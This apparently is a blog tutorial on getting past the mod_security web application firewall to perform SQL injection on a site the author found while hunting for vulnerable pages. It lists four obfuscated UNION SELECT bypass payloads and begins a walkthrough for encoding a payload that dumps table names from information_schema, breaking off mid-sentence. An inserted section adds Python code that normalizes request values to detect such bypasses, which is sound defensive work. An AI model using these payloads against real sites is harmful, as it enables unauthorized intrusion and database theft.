How to bypass mod_security (WAF)

Hello, this time I would like to share with you how to evade the WAF mod_security.

While looking for vulnerable pages I came across a website and, after spending a little time on it, realized that it could be vulnerable to SQL injection. I then realized that it was “protected” with mod_security and decided to see if I could skip the WAF.

I share how I did it …

sql injection + bypass Mod_Security

/*!50000un0x696fn*/+/*!12345AlL*/(/*!50000se0x6c65ct*/+1)

/*!50000%75%6e%69on*/ %73%65%6cect 1

/*!12345UnioN*//**/(/*!12345seLECT*//**/1)

/*!12345#qa%0A#%0AUnIOn*/(/*!12345#qa%0A#%0ASeleCt*//**/1)
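
Seen from the defending side, these strings get past a filter that matches keywords in the raw request value, because percent-encoding, mixed case and MySQL's executable comments (/*!NNNNN ... */) are only resolved later, by the server. The following is an added example, not part of the original post and not mod_security's own logic: it normalizes a value before matching, using the second to fourth strings above plus constructed benign values as input. All function and constant names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Signature of the kind a simple filter applies to the raw request value.
NAIVE = re.compile(r"union\s+select", re.IGNORECASE)
# Applied after normalization: UNION [ALL|DISTINCT] then SELECT,
# allowing whitespace or parentheses in between.
NORMALIZED = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?[\s(]*\bselect\b")

EXEC_COMMENT = re.compile(r"/\*!(?:\d{5})?(.*?)\*/", re.DOTALL)  # /*!NNNNN body */
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
LINE_COMMENT = re.compile(r"(?:#|--[ \t])[^\n]*")

def normalize(value: str, max_rounds: int = 3) -> str:
    """Reduce a parameter value to roughly what the MySQL parser would act on."""
    # 1. Percent-decode repeatedly (bounded) so double encoding is undone too.
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    # 2. MySQL executes the body of /*!NNNNN ... */, so keep the body.
    value = EXEC_COMMENT.sub(r" \1 ", value)
    # 3. Ordinary comments are ignored by the server: replace them with a space.
    value = BLOCK_COMMENT.sub(" ", value)
    value = LINE_COMMENT.sub(" ", value)
    # 4. Fold case and collapse whitespace.
    return " ".join(value.lower().split())

def naive_match(value: str) -> bool:
    return bool(NAIVE.search(value))

def normalized_match(value: str) -> bool:
    return bool(NORMALIZED.search(normalize(value)))

# Strings 2-4 from the list above, plus constructed benign values.
SAMPLES = [
    "/*!50000%75%6e%69on*/ %73%65%6cect 1",
    "/*!12345UnioN*//**/(/*!12345seLECT*//**/1)",
    "/*!12345#qa%0A#%0AUnIOn*/(/*!12345#qa%0A#%0ASeleCt*//**/1)",
    "student union election results",  # constructed, benign
    "id=42&sort=name",                 # constructed, benign
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"naive={naive_match(s)!s:5} normalized={normalized_match(s)!s:5} {s}")
```

The order of steps matters: stripping ordinary comments before unwrapping the executable ones would discard the very text the server goes on to execute.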

Create encoded sql payloads

In this part I would like to give an example of how to create an encoded payload. First we are going to define the payload that we want to encode: union select 1,2,3,concat(table_name),5 from information_schema.tables table_schema = database(). In this case we are using the payload without any encoding, but we have more ways to declare…